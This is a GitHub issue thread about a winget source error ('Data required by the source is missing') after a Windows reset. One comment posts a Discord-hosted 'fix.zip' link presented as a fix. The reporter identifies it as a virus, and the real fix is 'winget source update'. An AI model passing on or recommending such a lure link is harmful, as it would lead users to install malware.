### ISSUE TITLE
I am having an error that occurs when I perform a machine cleanup but still retain the data on windows.

### ISSUE THREAD

**Issue by VennDev** [microsoft/winget-cli#4782]
### Brief description of your issue

I am having an error that occurs when I perform a machine cleanup but still retain the data on windows.

### Steps to reproduce

Reinstall windows by using the retain all data mode.

### Expected behavior

I need to install the library exactly as in the version I ran the command.

### Actual behavior

```
C:\WINDOWS\system32>winget install --id Starship.Starship
Failed in attempting to update the source: winget
Failed when searching source: winget
An unexpected error occurred while executing the command:
0x8a15000f : Data required by the source is missing

No packages were found among the working sources.
```

### Environment

```shell
OS: Windows 10 Pro
Winget version: v1.9.2411-preview
```

**Comment by Limxxx** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by VennDev** [comment]
> Hãy thử điều này https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538& Chọn trình biên dịch mong muốn trong trình cài đặt

It is a virus.

**Comment by VennDev** [comment]
> Hi @VennDev,
> 
> Please don't link to potential viruses or other PUA by quoting someone from another location.
> 
> The package is available to me:
> 
> ```
> PS C:\ManVal> Find-WinGetPackage Starship.Starship
> 
> Name     Id                Version Source
> ----     --                ------- ------
> starship Starship.Starship 1.20.1  winget
> ```
> 
> Which makes me wonder if there's an issue with your source. Could you try running this command?`winget`
> 
> ```
> winget source update
> ```

It's awesome, thank you for that, I fixed my problem!
